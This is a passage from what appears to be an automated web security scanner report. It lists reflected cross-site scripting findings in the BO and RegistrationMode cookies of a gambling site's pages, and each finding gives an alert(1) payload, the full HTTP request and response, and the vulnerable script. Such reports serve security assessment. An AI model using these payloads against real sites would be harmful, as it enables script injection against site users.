<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM1019c"-alert(1)-"e2075c7bc3b";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.247. http://www.info.crazyscratch.com/InviteFriend.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/InviteFriend.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9722"-alert(1)-"452cc3e34b was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FMf9722"-alert(1)-"452cc3e34b; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:44 GMT; path=/
Set-Cookie: BO=FMf9722"-alert(1)-"452cc3e34b; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:44 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:44 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMf9722"-alert(1)-"452cc3e34b";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.248. http://www.info.crazyscratch.com/InviteFriend.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/InviteFriend.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a78c"-alert(1)-"a91a1aaad86 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM5a78c"-alert(1)-"a91a1aaad86; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM5a78c"-alert(1)-"a91a1aaad86; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM5a78c"-alert(1)-"a91a1aaad86";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.249. http://www.info.crazyscratch.com/PlayersClub.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24ff3"-alert(1)-"df7e568638e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM24ff3"-alert(1)-"df7e568638e; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:55 GMT; path=/
Set-Cookie: BO=FM24ff3"-alert(1)-"df7e568638e; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:55 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:55 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:55 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM24ff3"-alert(1)-"df7e568638e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.250. http://www.info.crazyscratch.com/PlayersClub.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed195"-alert(1)-"f71ad2bba2f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PMed195"-alert(1)-"f71ad2bba2f; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMed195"-alert(1)-"f71ad2bba2f; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:17 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:17 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:17 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMed195"-alert(1)-"f71ad2bba2f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.251. http://www.info.crazyscratch.com/Privacy.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Privacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73f57"-alert(1)-"5495d4ede87 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Privacy.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM73f57"-alert(1)-"5495d4ede87; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:43 GMT; path=/
Set-Cookie: BO=FM73f57"-alert(1)-"5495d4ede87; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:43 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:43 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:43 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:43 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM73f57"-alert(1)-"5495d4ede87";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.252. http://www.info.crazyscratch.com/Privacy.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Privacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bcf6"-alert(1)-"d70bb160f5b was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Privacy.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM4bcf6"-alert(1)-"d70bb160f5b; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM4bcf6"-alert(1)-"d70bb160f5b; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:07 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:07 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:07 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:07 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:07 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM4bcf6"-alert(1)-"d70bb160f5b";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.253. http://www.info.crazyscratch.com/Promotions.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b98d2"-alert(1)-"6f325db8eba was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FMb98d2"-alert(1)-"6f325db8eba; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: BO=FMb98d2"-alert(1)-"6f325db8eba; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMb98d2"-alert(1)-"6f325db8eba";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.254. http://www.info.crazyscratch.com/Promotions.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d21f"-alert(1)-"c9877ced936 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM8d21f"-alert(1)-"c9877ced936; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM8d21f"-alert(1)-"c9877ced936; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM8d21f"-alert(1)-"c9877ced936";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.255. http://www.info.crazyscratch.com/Responsible.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac727"-alert(1)-"63c733b0893 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FMac727"-alert(1)-"63c733b0893; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:57 GMT; path=/
Set-Cookie: BO=FMac727"-alert(1)-"63c733b0893; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:57 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:57 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 61117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMac727"-alert(1)-"63c733b0893";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.256. http://www.info.crazyscratch.com/Responsible.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a641"-alert(1)-"d0d94d4432a was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

